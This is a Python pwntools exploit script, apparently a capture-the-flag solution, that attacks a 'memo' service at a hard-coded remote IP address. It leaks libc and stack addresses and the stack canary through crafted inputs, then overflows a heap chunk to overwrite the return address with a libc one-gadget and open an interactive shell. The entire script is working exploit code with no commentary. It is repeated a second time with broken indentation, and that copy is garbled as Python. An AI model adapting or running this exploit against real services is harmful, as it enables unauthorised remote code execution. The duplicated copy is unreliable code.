romanking98/exploit_memo.py

## exploit_memo.py
#!/usr/bin/python
from pwn import *

elf = ELF("./libc-2.23.so")
p = remote("159.203.116.12", 8888)
#p = process("./memo",env={"LD_PRELOAD":"./libc-2.23.so"})
raw_input()

def menu():
	p.recvuntil(">")

def create_memo(data):
	menu()
	p.sendline("1")
	p.recvuntil("Data:")
	p.sendline(data)
	p.recvuntil("[yes/no]")
	p.sendline("yes\x00")

def create_memo_more(data,d2):
	menu()
	p.sendline("1")
	p.recvuntil("Data:")
	p.sendline(data)
	p.recvuntil("[yes/no]")
	p.sendline("no\x00")
	p.recvuntil("Data:")
	p.send(d2)

def show_data():
	menu()
	p.sendline("2")
	p.recvuntil("Data: ")
	return p.recvline()

def giveup(buf):
	menu()
	p.sendline("4")
	p.recvuntil("[yes/no]")
	p.sendline(buf)

def delete():
	menu()
	p.sendline("3")

data = "A"*23

create_memo(data)
create_memo(data)

buf = "no\x00"
buf += "C"*5
buf += p64(0x21)
buf += p64(0x21)

save = buf
buf += p64(0x0000000000601f90)		# puts@GOT

giveup(buf)

libc = show_data().strip("\n")
libc += "\x00"*2
libc = u64(libc) - elf.symbols['puts']
log.success("Libc: " + hex(libc))

buf = save
buf += p64(libc + elf.symbols['environ'])

giveup(buf)

stack = show_data().strip("\n")
stack += "\x00"*2
stack = u64(stack)
log.success("Stack: " + hex(stack-0x148))

fastbin = stack - 0x118

buf = save
buf += p64(stack-0x148+0x88-0x40+0x1)

giveup(buf)

can = show_data().strip("\n")[0:7]
can = "\x00" + can
can = u64(can)
log.success("Canary: " + hex(can))

# Leak canary. create 0x21 chunk. then create_more overflow.

buf = save
buf += p64(stack-0x148+0x30)
buf += "X"*8
buf += p64(0x21)


menu()
p.sendline("4")
p.recvuntil("[yes/no]")
p.send(buf)

#giveup(buf)

delete()

buf1 = "Y"*8
buf1 += p64(0x21)
buf1 += "Z"*8
buf1 += p64(stack-0x148+0x60)

buf2 = "F"*24
buf2 += p64(can)
buf2 += "F"*8
buf2 += p64(libc + 0xf1117)

create_memo_more(buf1,buf2)

menu()
p.sendline("4")
p.sendline("yes\x00")

p.interactive()
	#!/usr/bin/python
	from pwn import *

	elf = ELF("./libc-2.23.so")
	p = remote("159.203.116.12", 8888)
	#p = process("./memo",env={"LD_PRELOAD":"./libc-2.23.so"})
	raw_input()

	def menu():
	p.recvuntil(">")

	def create_memo(data):
	menu()
	p.sendline("1")
	p.recvuntil("Data:")
	p.sendline(data)
	p.recvuntil("[yes/no]")
	p.sendline("yes\x00")

	def create_memo_more(data,d2):
	menu()
	p.sendline("1")
	p.recvuntil("Data:")
	p.sendline(data)
	p.recvuntil("[yes/no]")
	p.sendline("no\x00")
	p.recvuntil("Data:")
	p.send(d2)

	def show_data():
	menu()
	p.sendline("2")
	p.recvuntil("Data: ")
	return p.recvline()

	def giveup(buf):
	menu()
	p.sendline("4")
	p.recvuntil("[yes/no]")
	p.sendline(buf)

	def delete():
	menu()
	p.sendline("3")

	data = "A"*23

	create_memo(data)
	create_memo(data)

	buf = "no\x00"
	buf += "C"*5
	buf += p64(0x21)
	buf += p64(0x21)

	save = buf
	buf += p64(0x0000000000601f90) # puts@GOT

	giveup(buf)

	libc = show_data().strip("\n")
	libc += "\x00"*2
	libc = u64(libc) - elf.symbols['puts']
	log.success("Libc: " + hex(libc))

	buf = save
	buf += p64(libc + elf.symbols['environ'])

	giveup(buf)

	stack = show_data().strip("\n")
	stack += "\x00"*2
	stack = u64(stack)
	log.success("Stack: " + hex(stack-0x148))

	fastbin = stack - 0x118

	buf = save
	buf += p64(stack-0x148+0x88-0x40+0x1)

	giveup(buf)

	can = show_data().strip("\n")[0:7]
	can = "\x00" + can
	can = u64(can)
	log.success("Canary: " + hex(can))

	# Leak canary. create 0x21 chunk. then create_more overflow.

	buf = save
	buf += p64(stack-0x148+0x30)
	buf += "X"*8
	buf += p64(0x21)


	menu()
	p.sendline("4")
	p.recvuntil("[yes/no]")
	p.send(buf)

	#giveup(buf)

	delete()

	buf1 = "Y"*8
	buf1 += p64(0x21)
	buf1 += "Z"*8
	buf1 += p64(stack-0x148+0x60)

	buf2 = "F"*24
	buf2 += p64(can)
	buf2 += "F"*8
	buf2 += p64(libc + 0xf1117)

	create_memo_more(buf1,buf2)

	menu()
	p.sendline("4")
	p.sendline("yes\x00")

	p.interactive()